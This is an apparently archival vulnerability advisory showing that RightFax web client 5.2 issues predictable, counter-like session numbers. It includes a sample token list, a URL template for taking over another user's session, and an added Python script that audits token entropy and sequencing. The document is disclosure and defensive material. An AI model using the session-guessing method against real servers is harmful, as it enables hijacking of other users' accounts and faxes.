COMMAND
Rightfax web client
SYSTEMS AFFECTED
Rightfax web client 5.2
PROBLEM
'ET LoWNOISE' found the following. When you use your web browser and
click to log on to the RightFax server, it opens a new window. In
that window you are asked for a username and password. The
toolbar of that browser window is hidden, but if you open the location
toolbar (Netscape: View / Show / Location Toolbar) you will see
something like this:
http://RIGHTFAXHOST/rightfax/fuwww.dll/c=urol2zi29uncz0/?load1
c=urol2zi29uncz0 <-- This is the session number
If you open several connections one after another, you will get:
[round 1]
c=ur o l 2 zi29u n c z0
c=ur q 2 1 zi29u n t z0
c=ur r i 0 zi29u p 3 z0
c=ur s x y zi29u p k z0
c=ur u e x zi29u q 6 z0
c=ur v u w zi29u q q z0
c=ur x b v zi29u r 8 z0
c=ur y r u zi29u r p z0
c=us 1 8 t zi29u s 7 z0
c=us 2 o s zi29u s q z0
c=us 4 5 r zi29u t 5 z0
c=us 5 l q zi29u t k z0
c=us 7 2 p zi29u u 1 z0
c=us 8 i o zi29u u f z0
c=us 9 y n zi29u u x z0
c=us b f m zi29u w c z0
[round 2]
c=us b f m zi29v 4 j z0
c=us c v l zi29v 4 x z0
c=us e c k zi29v 5 b z0
c=us f s j zi29v 5 p z0
c=us h 9 i zi29v 6 3 z0
c=us i p h zi29v 6 h z0
c=us k 6 g zi29v 6 y z0
c=us l m f zi29v 7 f z0
c=us n 3 e zi29v 7 r z0
c=us o j d zi29v 8 7 z0
c=us q 0 c zi29v 8 q z0
c=us r g b zi29v 9 4 z0
c=us s w a zi29v 9 o z0
[round 3]
c=ur l o 4 zi29v a 5 z0
c=ur n 5 3 zi29v a k z0
c=ur o l 2 zi29v b 6 z0
c=ur q 2 1 zi29v b k z0
c=ur s x y zi29v b x z0
c=ur u e x zi29v c c z0
c=ur v u w zi29v c r z0
c=ur x b v zi29v d 8 z0
c=ur y r u zi29v d y z0
xxxx a r b xxxxx d r xx
x = the same in every round
a = a-z,0-9
r = the next letter after the one in the previous round
b = 9-0,z-a
d = double (aa-zz,00-99)
THAT'S NOT RANDOM. So you can guess other users' session numbers.
So unhide the location toolbar and enter a URL of this form:
http://RIGHTFAXHOST/rightfax/fuwww.dll/c=other-session-number/?FOLDR&FFFF
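The following script is an added example; it is not part of the original advisory and not code from the RightFax product. It takes the session numbers listed above (with the marker spaces removed, in the order they were issued) and runs the checks an auditor applies to any session token before trusting it: which character positions never change, an optimistic upper bound on the bits of entropy the generator provides, and how often a newly issued token sorts after the previous one (a counter-like generator scores near 1, a random one near 0.5). For comparison it generates identifiers from the operating system's CSPRNG via Python's secrets module, which is the kind of generator a fixed server should use. The function names, the 0.9 sequential threshold and the 64-bit minimum are the example's own choices; 64 bits follows common guidance for session identifiers.

```python
import math
import secrets
from collections import Counter

# Session numbers copied from the advisory (the 'c=' value of the RightFax
# URL), in the order they were issued, with the marker spaces removed.
OBSERVED_TOKENS = [
    # round 1
    "urol2zi29uncz0", "urq21zi29untz0", "urri0zi29up3z0", "ursxyzi29upkz0",
    "uruexzi29uq6z0", "urvuwzi29uqqz0", "urxbvzi29ur8z0", "uryruzi29urpz0",
    "us18tzi29us7z0", "us2oszi29usqz0", "us45rzi29ut5z0", "us5lqzi29utkz0",
    "us72pzi29uu1z0", "us8iozi29uufz0", "us9ynzi29uuxz0", "usbfmzi29uwcz0",
    # round 2
    "usbfmzi29v4jz0", "uscvlzi29v4xz0", "useckzi29v5bz0", "usfsjzi29v5pz0",
    "ush9izi29v63z0", "usiphzi29v6hz0", "usk6gzi29v6yz0", "uslmfzi29v7fz0",
    "usn3ezi29v7rz0", "usojdzi29v87z0", "usq0czi29v8qz0", "usrgbzi29v94z0",
    "usswazi29v9oz0",
    # round 3
    "urlo4zi29va5z0", "urn53zi29vakz0", "urol2zi29vb6z0", "urq21zi29vbkz0",
    "ursxyzi29vbxz0", "uruexzi29vccz0", "urvuwzi29vcrz0", "urxbvzi29vd8z0",
    "uryruzi29vdyz0",
]

# Minimum entropy a session identifier should carry (assumed threshold,
# following common guidance for session tokens).
MIN_SESSION_ID_BITS = 64


def _columns(tokens):
    """Split equal-length tokens into one list of symbols per character position."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("all tokens must have the same length")
    return [[t[i] for t in tokens] for i in range(length)]


def constant_positions(tokens):
    """Positions whose symbol never changes across the sample (pure padding)."""
    return [i for i, col in enumerate(_columns(tokens)) if len(set(col)) == 1]


def estimated_entropy_bits(tokens):
    """Sum of per-position Shannon entropy. This is an optimistic upper bound
    on the generator's entropy because it ignores correlations between
    positions; a generator that fails even this bound is certainly weak."""
    total = 0.0
    for col in _columns(tokens):
        n = len(col)
        for count in Counter(col).values():
            p = count / n
            total -= p * math.log2(p)
    return total


def sequential_fraction(tokens):
    """Fraction of consecutive issuances where the later token sorts after the
    earlier one. A random generator gives roughly 0.5; a counter gives about 1."""
    pairs = list(zip(tokens, tokens[1:]))
    return sum(1 for earlier, later in pairs if later > earlier) / len(pairs)


def is_weak(tokens, min_bits=MIN_SESSION_ID_BITS, max_sequential=0.9):
    """True when the sample shows too little entropy or counter-like issuance."""
    return (estimated_entropy_bits(tokens) < min_bits
            or sequential_fraction(tokens) > max_sequential)


def secure_session_id():
    """256-bit session identifier from the OS CSPRNG (43 URL-safe characters)."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    print("constant positions:", constant_positions(OBSERVED_TOKENS))
    print("entropy upper bound: %.1f bits" % estimated_entropy_bits(OBSERVED_TOKENS))
    print("sequential fraction: %.2f" % sequential_fraction(OBSERVED_TOKENS))
    print("observed sample weak:", is_weak(OBSERVED_TOKENS))
    fresh = [secure_session_id() for _ in range(200)]
    print("secrets.token_urlsafe sample weak:", is_weak(fresh))
```

On the advisory's sample only 7 of the 14 positions vary at all, so even if those 7 were perfectly random the identifier could not exceed about 36 bits, and the issuance order is almost perfectly ascending; the script flags it as weak on both counts. A sample of identifiers from secrets.token_urlsafe passes both checks. The entropy figure is an upper bound from a small sample, so a token that passes it is not proven strong; one that fails it is proven weak.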
SOLUTION
Nothing yet.